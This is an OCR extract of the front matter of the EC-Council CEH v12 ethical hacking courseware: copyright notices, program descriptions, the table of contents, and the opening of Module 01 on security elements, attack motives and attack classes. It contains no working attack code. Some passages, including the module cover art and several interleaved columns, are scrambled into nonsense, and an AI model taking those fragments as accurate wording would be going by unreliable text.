146 70 384MB
English Pages [3800] Year 2023
—
C\EH
Certified |) Ethical Hacker
EC-Council ETHICAL HACKING AND COUNTERMEASURES
PROFESSIONAL SERIE
—
C\EH
Certified |) Ethical Hacker
EC-Council ETHICAL HACKING AND COUNTERMEASURES
PROFESSIONAL SERIE
Ethical Hacking and Countermeasures Version
12
Copyright © 2022 by EC-Council. All rights reserved. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but may not be reproduced for publication without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to EC-Council, addressed “Attention: EC-Council,” at the address below:
EC-Council New Mexico 101C Sun Ave NE Albuquerque, NM 87109 Information contained in this publication has been obtained by EC-Council from sources believed to be reliable. ECCouncil takes reasonable measures to ensure that the content is current and accurate; however,
because of the
possibility of human or mechanical error, we do not guarantee the accuracy, adequacy, or completeness of any information and are not responsible for any errors or omissions nor for the accuracy of the results obtained from
use of such information.
The courseware is a result of extensive research and contributions from subject-matter experts from all over the world. Due credits for all such contributions and references are given in the courseware in the research endnotes. We are committed to protecting intellectual property rights. If you are a copyright owner (an exclusive licensee or their agent) and you believe that any part of the courseware constitutes an infringement of copyright, or a breach of an agreed license or contract, you may notify us at [email protected]. In the event of a justified complaint, ECCouncil will remove the material in question and make necessary rectifications. The courseware may contain references to other information resources and security solutions, but such references should not be considered as an endorsement of or recommendation by EC-Council. Readers are encouraged to report errors, omissions, and inaccuracies to EC-Council at [email protected]. If you have any issues, please contact us at [email protected].
NOTICE TO THE READER EC-Council does not warrant or guarantee any of the products, methodologies, or frameworks described herein nor does it perform any independent analysis in connection with any of the product information contained herein. ECCouncil does not assume, and expressly disclaims, any obligation to obtain and include information other than that provided to it by the manufacturer. The reader is expressly warned to consider and adopt all safety precautions that might be indicated by the activities described herein and to avoid all potential hazards. By following the instruction contained herein, the reader willingly assumes all risks in connection with such instructions. EC-Council makes no representations or warranties of any kind, including but not limited to the warranties of fitness for particular purpose or merchantability, nor are any such representations implied with respect to the material set forth herein, and ECCouncil takes no responsibility with respect to such material. EC-Council shall not be liable for any special, consequential, or exemplary damages resulting, in whole or in part, from the reader’s use of or reliance upon this
material.
Page Il
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Foreword Since you are reading this CEHv12 courseware, you most likely realize the importance of information systems security. However, we would like to put forth our motive behind compiling a resource such as this one and what you can gain from this course. You might find yourself asking what sets this course apart from the others out there. The truth is that no single courseware can address all the issues of information security in a detailed manner.
Moreover, the rate at which exploits, tools, and methods are being discovered by the security community makes it difficult for one program to cover all the necessary facets of information security. This doesn’t mean that this course is inadequate in any way as we have worked to cover all major domains in such a manner that the reader will be able to appreciate the way security has evolved over time as well as gain insight in to the fundamental workings relevant to each domain. It is a blend of academic and practical wisdom supplemented with tools that the reader can readily access in order to obtain a hands-on experience.
The emphasis throughout the courseware is on gaining practical know-how, which explains the stress on free and accessible tools. You will read about some of the most widespread attacks seen, the popular tools used by attackers, and how attacks have been carried out using ordinary
resources.
You may also want to know what to expect once you have completed the course. This courseware is a resource material. Any penetration tester can tell you that there is no one straight methodology or sequence of steps that you can follow while auditing a client site. There is no one template that will meet all your needs. Your testing strategy will vary with the client, the basic information about the system or situation, and the resources at your disposal. However, for each stage you choose — be it enumeration, firewall, penetration of other domains - you will find something in this courseware that you can definitely use. Finally, this is not the end! This courseware is to be considered a constant work-in-progress because we will be adding value to this courseware over time. You may find some aspects extremely detailed, while others may have less detail. We are constantly asking ourselves if the content helps explain the core point of the lesson, and we constant calibrate our material with that in mind. We would love to hear your viewpoints and suggestions so please send us your feedback to help in our quest to constantly improve our courseware.
Page ll
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
About the EC-Council CEH Program If you want to stop hackers from invading your network, first you've got to invade their minds. Computers around the world are systematically being victimized by rampant hacking. This hacking is not only widespread, but is being executed so flawlessly that the attackers compromise a system, steal everything of value and completely erase their tracks. The goal of the ethical hacker is to help the organization take preemptive measures against malicious attacks by attacking the system himself; all the while staying within legal limits. This philosophy stems from the proven practice of trying to catch a thief, by thinking like a thief. As technology advances and organization depend on technology increasingly, information assets have evolved into critical components of survival. If hacking involves creativity and thinking ‘out-of-the-box’, then vulnerability testing and security audits will not ensure the security proofing of an organization. To ensure that organizations have adequately protected their information assets, they must adopt the approach of ‘defense in depth’. In other words, they must penetrate their networks and assess the security posture for vulnerabilities and exposure. The Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods as a Hacker. Hacking is a felony in some countries. When it is done by request and under a contract between an Ethical Hacker and an organization, it is legal. The most important point is that an Ethical Hacker has authorization to probe the target. The CEH Program certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective. The Certified Ethical Hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker. To achieve the Certified Ethical Hacker Certification, you must pass the CEH exam 312-50.
Please visit information.
https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
for
more
Course Prerequisites It is highly recommended that candidates pursuing this course have a fundamental understanding of operating systems, file systems, computer networks, TCP/IP protocols, information security controls, basic network troubleshooting, data leakage, data backup, and risk
management.
Page IV
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
About EC-Council The International Council of Electronic Commerce Consultants, better known as EC-Council, was founded in late 2001 to address the need for well-educated and certified information security and e-business practitioners. EC-Council is a global, member-based organization composed of industry and subject matter experts working together to set the standards and raise the bar in information security certification and education.
EC-Council first developed the the methodologies, tools, and of hundreds of subject-matter the world and is now delivered centers. It is considered as the around the globe.
Certified Ethical Hacker (C|EH) program with the goal of teaching techniques used by hackers. Leveraging the collective knowledge experts, the CEH program has rapidly gained popularity around in more than 145 countries by more than 950 authorized training benchmark for many government entities and major corporations
EC-Council, through its impressive network of professionals and huge industry following, has also developed a range of other leading programs in information security and e-business. EC-Council certifications are viewed as the essential certifications needed when standard configuration and security policy courses fall short. Providing a true, hands-on, tactical approach to security, individuals armed with the knowledge disseminated by EC-Council programs are tightening security networks around the world and beating hackers at their own game.
Other EC-Council Programs “ve
Awareness: Certified Secure Computer User
The purpose of the CSCU training program is to provide students with the necessary knowledge and skills to protect their information assets. C s C U This class will immerse students in an interactive learning environment where they will acquire fundamental understanding of various cers | Secure Computer User computer and network security threats such as identity theft, credit card fraud, online banking phishing scams, viruses and backdoors, email hoaxes, sexual predators and other online threats, loss of confidential information, hacking attacks, and social engineering. More importantly, the skills learnt from the class help students take the necessary steps to mitigate their security exposure.
“
Security: Certified Cybersecurity Technician
Certified |ctety
Page V
Technician
The Certified Cybersecurity Technician (CCT) program covers the fundamental concepts of cybersecurity. It equips students with the skills required to identify the increasing network security threats that reflect on the organization's security posture and implement general security controls to protect the underlying IT infrastructure from unauthorized . . . access, alteration, destruction, or disclosure.
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
This program gives a holistic overview of the key components of cybersecurity. The course is designed for those interested in learning the various fundamentals of cybersecurity and aspire to pursue a career in cybersecurity.
Network Defense: Certified Network Defender Students enrolled in the Certified Network Defender course will gain a detailed understanding of network defense and develop their hands-on C N D expertise to perform in real-life network defense situations. They will gain the depth of technical knowledge required to actively design a secure Certified | Network Defender network within your organization. This course provides a fundamental understanding of the true nature of data transfer, network technologies, and software technologies so that students may understand how networks operate, how automation software behaves, and how to analyze networks and their defense. Students will learn how to protect, detect, and respond to the network attacks as well as learning about network defense fundamentals, the application of network security controls, protocols, perimeter appliances, secure IDS, VPN, and firewall configuration. Students will also learn the intricacies of network traffic signature, analysis, and vulnerability scanning, which will help in designing improved network security policies and successful incident response plans. These skills will help organizations foster resiliency and operational continuity during attacks.
Network Defense: Certified Cloud Security Engineer Certified Cloud Security Engineer (CCSE) course includes both vendor neutral and vendor specific cloud security concepts. Vendor neutral C C S E concepts include universally applicable general cloud security best practices, | technology, | frameworks, and principles that help Cloud Security Engineer individuals to strengthen their fundamentals. Vendor specific concepts help individuals to gain the practical skills required when they actually start working with a specific cloud platform. Thus, this course helps individuals in strengthening their fundamental cloud security knowledge and gain practical knowledge of security practices, tools, and techniques used to configure widely used public cloud providers such as AWS, AZURE, and GCP.
Penetration Testing: Certified Penetration Testing Professional CPENT certification requires you to demonstrate the application of advanced penetration testing techniques such as advanced C PENT Windows attacks, IOT systems attacks, advanced binaries exploitation, exploits writing, bypassing a filtered network, nit | Penetration Testing Professional Operational Technology (OT) pen testing, accessing hidden networks with pivoting and double pivoting, privilege escalation, and evading defense mechanisms.
Page VI
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council’s CPENT standardizes the knowledge base for penetration testing professionals by incorporating best practices followed by experienced experts in the field. The objective of the CPENT is to ensure that each professional follows a strict code of ethics, is exposed to the best practices in the domain of penetration testing and aware of all the compliance requirements required by the industry. Unlike a normal security certification, the CPENT credential provides an assurance that security professionals possess skills to analyze the security posture of a network exhaustively and recommend corrective measures authoritatively. For many years EC-Council has been certifying IT Security Professionals around the globe to ensure these professionals are proficient in network security defense mechanisms. EC-Council’s credentials vouch for their professionalism and expertise thereby making these professionals more sought after by organizations and consulting firms globally.
Computer Forensics: Computer Hacking Forensic Investigator ™ Computer | Hacking Forensic
INVESTIGATOR
Computer Hacking Forensic Investigator (CHFI) is a comprehensive course covering major forensic investigation scenarios. It enables students to acquire crucial hands-on experience with various forensic investigation techniques. Students learn how to utilize standard
forensic
tools
to
successfully
carry
out
a
computer
investigation, preparing them to better aid in the prosecution of perpetrators.
forensic
EC-Council’s CHFI certifies individuals in the specific security discipline of computer forensics from a vendor-neutral perspective. The CHFI certification bolsters the applied knowledge of law enforcement personnel, system administrators, security officers, defense and military personnel, legal professionals, bankers, security professionals, and anyone who is concerned about the integrity of network infrastructures.
Incident Handling: EC-Council Certified Incident Handler |
™
EC-Council’s Certified Incident Handler (E|CIH) program has been designed and developed in collaboration with cybersecurity and E C | H incident handling and response practitioners across the globe. EG-Council | certified incident Handler [t is a comprehensive specialist-level program that imparts knowledge and skills that organizations need to effectively handle post breach consequences by reducing the impact of the incident, from both a financial and a reputational perspective. E|CIH is a method-driven program that uses a holistic approach to cover vast concepts concerning organizational incident handling and response from preparing and planning the incident handling response process to recovering organizational assets after a security incident. These concepts are essential for handling and responding to security incidents to protect organizations from future threats or attacks.
Page VII
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
nl
Certified Chief Information Security Officer
The Certified Chief Information Security Officer (CCISO) program was developed by EC-Council to fill a knowledge gap in the information C ¢c | $0 security industry. Most information security certifications focus on Certified | Security Officer specific tools or practitioner capabilities. When the CCISO program was developed, no certification existed to recognize the knowledge, skills, and aptitudes required for an experienced information security professional to perform the duties of a CISO effectively and competently. In fact, at that time, many questions existed about what a CISO really was and the value this role adds to an organization. The CCISO Body of Knowledge helps to define the role of the CISO and clearly outline the contributions this person makes in an organization. EC-Council enhances this information through training opportunities conducted as instructor-led or self-study modules to ensure candidates have a complete understanding of the role. EC-Council evaluates the knowledge of CCISO candidates with a rigorous exam that tests their competence across five domains with which a seasoned security leader should be familiar.
Application Security: Certified Application Security Engineer AYNTN C
A
const | sss
SEE
C
A
S
E
Cenifed | Apoticaton Securiy Ensineer
The Certified Application Security Engineer
(CASE)
credential
is
developed
in
partnership with large application and software development experts globally.
The
CASE
credential
tests
the
critical
security skills and knowledge required throughout a typical software development life cycle (SDLC), focusing on the importance of the implementation of secure methodologies and practices in today’s insecure operating environment.
The CASE certified training program is developed concurrently to prepare software professionals with the necessary capabilities that are expected by employers and academia globally. It is designed to be a hands-on, comprehensive application security course that will help software professionals create secure applications. The training program encompasses security activities involved in all phases of the Software Development Lifecycle (SDLC): planning, creating, testing, and deploying an application. Unlike other application security trainings, CASE goes beyond just the guidelines on secure coding practices and includes secure requirement gathering, robust application design, and handling security issues in post development phases of application development. This makes CASE one of the most comprehensive certifications on the market today. It is desired by software application engineers, analysts, testers globally, and respected by hiring authorities.
Page VIIL
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Incident Handling: Certified Threat Intelligence Analyst
C
I
|
A
cain | Threat Intelligence Analyst
Certified Threat Intelligence Analyst (C| TIA) is designed and developed in collaboration with cybersecurity and threat intelligence experts across the globe to help organizations identify and mitigate business risks by converting unknown internal and external threats into known threats. It is a comprehensive, specialist-level program that teaches a structured approach for building effective threat intelligence.
In the ever-changing threat landscape, C|TIA is an essential Threat Intelligence training program for those who deal with cyber threats on a daily basis. Organizations today demand a professional-level cybersecurity threat intelligence analyst who can extract the intelligence from data by implementing various advanced strategies. Such professional-level Threat Intelligence training programs can only be achieved when the core of the curricula maps with and is compliant to government and industry published threat intelligence frameworks.
Incident Handling: Certified SOC Analyst The Certified SOC Analyst (CSA) program is the first step to joining a security operations center (SOC). It is engineered for current and aspiring Tier | and Tier Il SOC analysts to achieve proficiency in performing entry-level and intermediate-level operations. CSA is a training and credentialing program that helps the candidate Certified SOC = Analyst acquire trending and in-demand technical skills through instruction by some of the most experienced trainers in the industry. The program focuses on creating new career opportunities through extensive, meticulous knowledge with enhanced level capabilities for dynamically contributing to a SOC team. Being an intense 3-day program, it thoroughly covers the fundamentals of SOC operations, before relaying the knowledge of log management and correlation, SIEM deployment, advanced incident detection, and incident response. Additionally, the candidate will learn to manage various SOC processes and collaborate with CSIRT at the time of need.
Page IX
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Exam
Information CEH Exam Details
Exam Title
Certified Ethical Hacker (CEH)
Exam Code
312-50
Availability
EC-Council Exam Portal (please visit https://www.eccexam.com)
VUE (please visit https://home.pearsonvue.com/eccouncil) Duration
4 Hours
Questions
125
Passing Score
Please refer https://cert.eccouncil.org/faq.html
Please visit https://cert.eccouncil.org/certified-ethical-hacker.html for more information.
Page X
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Table of Contents Module 01: Introduction to Ethical Hacking
1
Information Security Overview
4
Hacking Methodologies and Frameworks
13
Hacking Concepts
36
Ethical Hacking Concepts
42
Information Security Controls
51
Information Security Laws and Standards
82
Module 02: Footprinting and Reconnaissance
101
Footprinting Concepts
104
Footprinting through Search Engines
112
Footprinting through Web Services
133
Footprinting through Social Networking Sites
176
Website Footprinting
189
Email Footprinting
207
Whois Footprinting
214
DNS Footprinting
221
Network Footprinting
227
Footprinting through Social Engineering
238
Footprinting Tools
244
Footprinting Countermeasures.
254
Module 03: Scanning Networks
257
Network Scanning Concepts
260
Scanning Tools
271
Host Discovery
282
Port and Service Discovery
297
OS Discovery (Banner Grabbing/OS Fingerprinting)
331
Scanning Beyond IDS and Firewall
345
Network Scanning Countermeasures
380
Module 04: Enumeration
Page XI
397
Enumeration Concepts
400
NetBIOS Enumeration
411
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
SNMP Enumeration
422
LDAP Enumeration
432
NTP and NFS Enumeration
442
SMTP and DNS Enumeration
456
Other Enumeration Techniques
479
Enumeration Countermeasures
504
Module 05: Vulnerability Analysis
511
Vulnerability Assessment Concepts
515
Vulnerability Classification and Assessment Types
542
Vulnerability Assessment Tools
558
Vulnerability Assessment Reports
575
Module 06: System Hacking Gaining Access
584
Escalating Privileges
708
Maintaining Access
771
Clearing Logs
902
Module 07: Malware Threats
943
Malware Concepts
946
APT Concepts
961
Trojan Concepts
969
Virus and Worm Concepts
1021
Fileless Malware Concepts
1062
Malware Analysis
1084
Malware Countermeasures
1186
Anti-Malware Software
1195
Module 08: Sniffing
Page Xil
581
1205
Sniffing Concepts
1208
Sniffing Technique: MAC Attacks
1227
Sniffing Technique: DHCP Attacks
1242
Sniffing Technique: ARP Poisoning
1255
Sniffing Technique: Spoofing Attacks
1271
Sniffing Technique: DNS Poisoning
1289
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Sniffing Tools
1301
Snifing Countermeasures
1314
Module 09: Social Engineering
1325
Social Engineering Concepts
1328
Social Engineering Techniques
1336
Insider Threats
1367
Impersonation on Social Networking Sites
1375
Identity Theft
1382
Social Engineering Countermeasures
1388
Module 10: Denial-of-Service
1413
DoS/DDoS Concepts
1416
Botnets
1421
DoS/DDoS Attack Techniques
1433
DDoS Case Study
1467
DoS/DDoS Attack Countermeasures
1476
Module 11: Session Hijacking
1507
Session Hijacking Concepts
1510
Application-Level Session Hijacking
1526
Network-Level Session Hijacking
1556
Session Hijacking Tools
1567
Session Hijacking Countermeasures
1573
Module 12: Evading IDS, Firewalls, and Honeypots
Page XIII
1603
IDS, IPS, Firewall, and Honeypot Concepts
1606
IDS, IPS, Firewall, and Honeypot Solutions
1641
Evading IDS
1666
Evading Firewalls
1690
Evading NAC and Endpoint Security
1728
IDS/Firewall Evading Tools
1752
Detecting Honeypots
1756
IDS/Firewall Evasion Countermeasures
1763
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 13: Hacking Web Servers
1769
Web Server Concepts
1772
Web Server Attacks
1782
Web Server Attack Methodology
1804
Web Server Attack Countermeasures
1843
Patch Management
1871
Module 14: Hacking Web Applications
1879
Web Application Concepts
1883
Web Application Threats
1894
Web Application Hacking Methodology
1989
Web API, Webhooks, and Web Shell
2086
Web Application Security
2142
Module 15: SQL Injection
2195
SQL Injection Concepts
2198
Types of SQL Injection
2212
SQL Injection Methodology
2230
SQL Injection Tools
2314
Evasion Techniques
2319
SQL Injection Countermeasures
2337
Module 16: Hacking Wireless Networks
2361
Wireless Concepts
2364
Wireless Encryption
2381
Wireless Threats
2400
Wireless Hacking Methodology
2432
Wireless Hacking Tools
2515
Bluetooth Hacking
2528
Wireless Attack Countermeasures
2544
Wireless Security Tools
2558
Module 17: Hacking Mobile Platforms
2577
Mobile Platform Attack Vectors
2580
Hacking Android OS
2617
Hacking iOS
2679
Page XIV
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Mobile Device Management
2712
Mobile Security Guidelines and Tools
2727
Module 18: loT and OT Hacking
2759
loT Concepts
2764
loT Attacks
2786
loT Hacking Methodology
2834
loT Attack Countermeasures
2895
OT Concepts
2914
OT Attacks
2942
OT Hacking Methodology
2972
OT Attack Countermeasures
3015
Module 19: Cloud Computing
3035
Cloud Computing Concepts
3039
Container Technology
3080
Serverless Computing
3108
Cloud Computing Threats
3115
Cloud Hacking
3178
Cloud Security
3250
Module 20: Cryptography
3311
Cryptography Concepts
3314
Encryption Algorithms
3321
Cryptography Tools
3370
Public Key Infrastructure (PKI)
3380
Email Encryption
3388
Disk Encryption
3421
Cryptanalysis
3431
Cryptography Attack Countermeasures
3459
Glossary
3465
References
3493
Appendix A - Ethical Hacking Essential Concepts - |
3565
Appendix B - Ethical Hacking Essential Concepts - II
3685
Page XV
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
C\EH
Ec-Council
Certified |) Ethical Hacker
MODULE 01
———
INTRODUCTION TO ——— ETHICAL HACKI mirnoe
01 [
(1+x+y+ 2a)-3a
mh-->0
+2a....+a
eheaBad}j
—_
context,
sq}agied_obF
ect sfone.name]. se
a
exactly Lays a pitase ! selec t Pixty2 Jptntt
lextyt2a#21
Asbes
2+ ssdotton”
lim h=->0
;
=
f="
‘’
x
1+ x SVe2a)e(3ae3q909 *ec 1
““EC-COUNCIL OFFICIAL CURRICULA
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
LEARNING
OBJECTIVES
© LO#01: Explain Information Security Concepts
© LO#04: Explain Ethical Hacking Concepts and Scope
© LO#02: Explain Hacking Methodologies and Frameworks
© LO#05: Summarize the Techniques used in Information Security Controls
@ LO#03: Explain Hacking Concepts and
©
Different Hacker Classes
LO#06: Explain the Importance of Applicable Security
Laws and Standards
Copyright © by
Al RightsReserved, Reproduction
i Strictly Prohibited.
Learning Objectives Attackers break into systems for various reasons and purposes. Therefore, it is important to understand how malicious hackers attack and exploit systems and the probable reasons behind these attacks. As Sun Tzu states in the Art of War, “If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat.” System administrators and security professionals must guard their infrastructure against exploits by knowing the enemy—malicious hackers who seek to use the same infrastructure for illegal activities.
At the end of this module, you will be able to: =
Describe the elements of information security
=
Explain information security attacks and information warfare
=
Describe various hacking methodologies and frameworks
=
Describe hacking concepts and hacker classes
=
Explain ethical hacking concepts and scope
=
Understand information security controls (information assurance, defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management process, and artificial intelligence (Al)/machine learning (ML))
=
Understand various information security acts and laws
Module 01 Page 3
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
LO#01: Explain Information Security Concepts
Copyright © by
ved
Strictly Prohibited
Information Security Overview Information security refers to the protection or safeguarding of information and information systems that use, store, and transmit information from unauthorized access, disclosure, alteration, and destruction. Information is a critical asset that organizations must secure. If sensitive information falls into the wrong hands, then the respective organization may suffer huge losses in terms of finances, brand reputation, customers, or in other ways. To provide an understanding of how to secure such critical information resources, this module starts with an overview of information security. This section introduces information warfare.
Module 01 Page 4
the
elements
of information
security,
classification
of attacks,
and
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Elements of Information Security
CE H
Information security is a state of well-being of information and infrastructure in which the possibility of theft, tampering, and disruption of information and services is low or tolerable Confidentiality
Integrity Availability Authenticity Non-Repudiation
Assurance that the information is accessible only to those authorized to have access
The trustworthinessof data or resources in terms of preventing improper or unauthorized changes Assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users Refers to the characteristic of a communication, document, or any data that ensures the quality of being genuine
A guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message
Elements of Information Security Information security is “the state of the well-being of information and infrastructure in which the possibility of theft, tampering, or disruption of information and services is kept low or tolerable.” It relies on five major elements: confidentiality, integrity, availability, authenticity, and non-repudiation. Confidentiality Confidentiality is the assurance that the information is accessible only to authorized. Confidentiality breaches may occur due to improper data handling or a hacking attempt. Confidentiality controls include data classification, data encryption, and proper disposal of equipment (such as DVDs, USB drives, and Blu-ray discs). Integrity Integrity is the trustworthiness of data or resources in the prevention of improper and unauthorized changes—the assurance that information is sufficiently accurate for its purpose. Measures to maintain data integrity may include a checksum (a number produced by a mathematical function to verify that a given block of data is not changed) and access control (which ensures that only authorized people can update, add, or delete data).
Availability Availability is the assurance that the systems responsible for delivering, storing, and processing information are accessible when required by authorized users. Measures to maintain data availability can include disk arrays for redundant systems and clustered
Module 01 Page 5
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking machines, antivirus software (DDoS) prevention systems.
=
Exam 312-50 Certified Ethical Hacker
to
combat
malware,
and
distributed
denial-of-service
Authenticity Authenticity refers to the characteristic of communication, documents, or any data that ensures the quality of being genuine or uncorrupted. The major role of authentication is to confirm that a user is genuine. Controls such as biometrics, smart cards, and digital certificates ensure the authenticity of data, transactions, communications, and documents.
=
Non-Repudiation Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message. Individuals and organizations use digital signatures to ensure non-repudiation.
Module 01 Page 6
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Motives, Goals, and Objectives of Information Security Attacks Attacks = Motive (Goal)
CE H
+ Method + Vulnerability
‘@ A motive originates out of the notion that the target system stores or processes something valuable, and this leads to the threat of an attack on the system
@ Attackers try various tools and attack techniques to exploit vulneral policy and controls in order to fulfil their motives
s in a computer system or its security
Motives behind information security attacks
© Disrupting business continuity © Stealinginformation and manipulating data
Propagating religious or political beliefs Achievinga state’s military objectives
© Creating fear and chaos by disrupting critical
the reputation of the target Damaging
infrastructures © Causing financial lossto the target
Takingrevenge Demandingransom
Motives, Goals, and Objectives of Information Security Attacks Attackers generally have motives (goals), and objectives behind their information security attacks. A motive originates out of the notion that a target system stores or processes something valuable, which leads to the threat of an attack on the system. The purpose of the attack may be to disrupt the target organization’s business operations, to steal valuable information for the sake of curiosity, or even to exact revenge. Therefore, these motives or goals depend on the attacker’s state of mind, their reason for carrying out such an activity, as well as their resources and capabilities. Once the attacker determines their goal, they can employ various tools, attack techniques, and methods to exploit vulnerabilities in a computer system or security policy and controls.
Attacks = Motive (Goal) + Method + Vulnerability Motives behind information security attacks
=
Disrupt business continuity
=
Propagate religious or political beliefs
=
Perform information theft
=
Achieve a state’s military objectives
=
Manipulating data
=
Damage the reputation of the target
=
Create fear and chaos by disrupting critical infrastructures
= *
Take revenge Demand ransom
=
Bring financial loss to the target
Module 01 Page 7
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Classification of Attacks
CE H
Passive Attacks
@ Passive attacksdo not tamper with the data and involve intercepting and monitoring network traffic and data flow on the target network @ Examples include sniffing and eavesdropping
Active Attacks
© Active attacks tamper with the data in transit or disrupt the communication or services between the systems to bypassor break into secured systems © Examples include DoS, Man-in-the-Middle, session hijacking, and SQL injection
Close-in Attacks
© Close-in attacksare performed when the attacker is in close physical proximity with the target system or network in order to gather, modify, or disrupt access to information
© Examples include social engineering such as eavesdropping, shoulder surfing, and dumpster diving
Insider Attacks
© Insider attacks involve using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems © Examples include theft of physical devices and planting keyloggers, backdoors, and malware
Distribution
© Distribution attacks occur when attackers tamper with hardware or software prior to installation
Attacks
© Attackers tamper with the hardware or software at its source or in transit
Classification of Attacks According to IATF, security attacks are classified into five categories: insider, and distribution.
passive, active, close-in,
Passive Attacks Passive attacks involve intercepting and monitoring network traffic and data flow on the target network and do not tamper with the data. Attackers perform reconnaissance on network activities using sniffers. These attacks are very difficult to detect as the attacker has no active interaction with the target system or network. Passive attacks allow attackers to capture the data or files being transmitted in the network without the consent of the user. For example, an attacker can obtain information such as unencrypted data in transit, clear-text credentials, or other sensitive information that is useful in performing active attacks.
Examples of passive attacks: o
Footprinting
o.
Sniffing and eavesdropping
o
Network traffic analysis
o
Decryption of weakly encrypted traffic
Active Attacks Active attacks tamper with the data in transit or disrupt communication or services between the systems to bypass or break into secured systems. Attackers launch attacks on the target system or network by sending traffic actively that can be detected. These
Module 01 Page 8
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
attacks are performed on the target network to exploit the information in transit. They penetrate or infect the target’s internal network and gain access to a remote system to compromise the internal network. Examples of active attacks: o
Denial-of-service (DoS) attack
©
Firewall and IDS attack
o
Bypassing protection mechanisms
©.
Profiling
o
Malware attacks (such as
o
Arbitrary code execution
o
Modification of information
©
Backdoor access
©
Spoofing attacks
o
Replay attacks
©
Cryptography attacks
o
Password-based attacks
© ©
SQL injection XSS attacks
©
Session hijacking
o
Directory traversal attacks
o
Man-in-the-Middle attack
o
o
Compromised-key attack
o
viruses, worms, ransomware)
DNS and ARP poisoning
©.
Privilege escalation
Exploitation of application and
OS software
Close-in Attacks Close-in attacks are performed when the target system or network. The main goal modify information or disrupt its access. user credentials. Attackers gain close access, or both.
attacker is in close physical proximity with the of performing this type of attack is to gather or For example, an attacker might shoulder surf proximity through surreptitious entry, open
Examples of close-in attacks: o
Social engineering (Eavesdropping, shoulder surfing, dumpster diving, and other methods)
Insider Attacks Insider attacks are performed by trusted persons who have physical access to the critical assets of the target. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. They misuse the organization’s assets to directly affect the confidentiality, integrity, and availability of information systems. These attacks impact the organization’s business operations, reputation, and profit. It is difficult to figure out an insider attack Examples of insider attacks: o
Eavesdropping and wiretapping
Module 01 Page 9
o
Theft of physical devices
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
=
o
Social engineering
o
Data theft and spoliation
o
Pod slurping
Exam 312-50 Certified Ethical Hacker o
Planting keyloggers, backdoors, or malware
Distribution Attacks Distribution attacks occur when attackers tamper with hardware or software prior installation. Attackers tamper the hardware or software at its source or when it is transit. Examples of distribution attacks include backdoors created by software hardware vendors at the time of manufacture. Attackers leverage these backdoors gain unauthorized access to the target information, systems, or network. o
Modification of software or hardware during production
o
Modification of software or hardware during distribution
Module 01 Page 10
to in or to
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
